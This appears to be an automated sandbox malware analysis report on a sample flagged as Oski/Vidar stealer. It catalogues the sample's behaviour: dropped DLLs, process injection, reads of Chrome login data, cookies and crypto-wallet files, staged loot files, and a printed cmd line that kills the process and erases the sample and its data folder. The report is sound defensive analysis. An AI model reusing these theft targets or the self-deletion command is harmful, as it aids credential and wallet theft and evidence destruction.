Source:	Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: wntdll.pdbUGP source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F301B0F push ss; iretd
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B920 push edx; ret
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B98E push ecx; retf 0000h
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3380F5 push ecx; ret
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B8C65 push ecx; ret

Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /35
Source: sqlite3.dll.1.dr	Static PE information: section name: /51
Source: sqlite3.dll.1.dr	Static PE information: section name: /63
Source: sqlite3.dll.1.dr	Static PE information: section name: /77
Source: sqlite3.dll.1.dr	Static PE information: section name: /89
Source: sqlite3.dll.1.dr	Static PE information: section name: /102
Source: sqlite3.dll.1.dr	Static PE information: section name: /113
Source: sqlite3.dll.1.dr	Static PE information: section name: /124
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\Users\user\AppData\Local\Temp\nsy255F.tmp\qhvek.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (68).png

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33727E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\gunzipped.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007CB4E0 GetSystemInfo,

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405C06 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405C06 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B43DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007D0540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CE640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CD360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CF6B0 FindFirstFileExW,

Source: C:\Users\user\Desktop\gunzipped.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33B734 IsDebuggerPresent,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33A967 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33744F GetProcessHeap,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019EA30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E6EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E902 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E9B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E9F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C96D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CB750 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F337F7D SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B72E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B4354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007BE5C7 SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\gunzipped.exe

Memory written: C:\Users\user\Desktop\gunzipped.exe base: 7B0000 value starts with: 4D5A

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068

Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068

Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\autofill\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\cc\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\cookies\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\outlook.txt VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\passwords.txt VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\screenshot.jpg VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\system.txt VolumeInformation
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33B9B4 cpuid

Source: C:\Users\user\Desktop\gunzipped.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\gunzipped.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F337ABA GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007BD6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405931 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007CB1E0 GetUserNameA,

Stealing of Sensitive Information:

Yara detected Oski Stealer

Show sources

Source: Yara match	File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp	String found in binary or memory: Electrum-LTC
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp	String found in binary or memory: ElectronCashxg
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp	String found in binary or memory: jaxxxE[
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: window-state.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: exodus.conf.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: info.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: passphrase.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: \\Ethereum\\
Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp	String found in binary or memory: Ethereum
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: default_wallet
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp	String found in binary or memory: MultiDoge
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: seed.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Remote Access Functionality:

Yara detected Oski Stealer

Show sources

Source: Yara match	File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Data Obfuscation2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection111	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Ingress Tool Transfer11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Encrypted Channel2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery58	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery31	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol111	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection111	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gunzipped.exe	53%	ReversingLabs	Win32.Trojan.Risis
gunzipped.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\sqlite3.dll	3%	Metadefender	Browse
C:\ProgramData\sqlite3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.gunzipped.exe.2cb0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
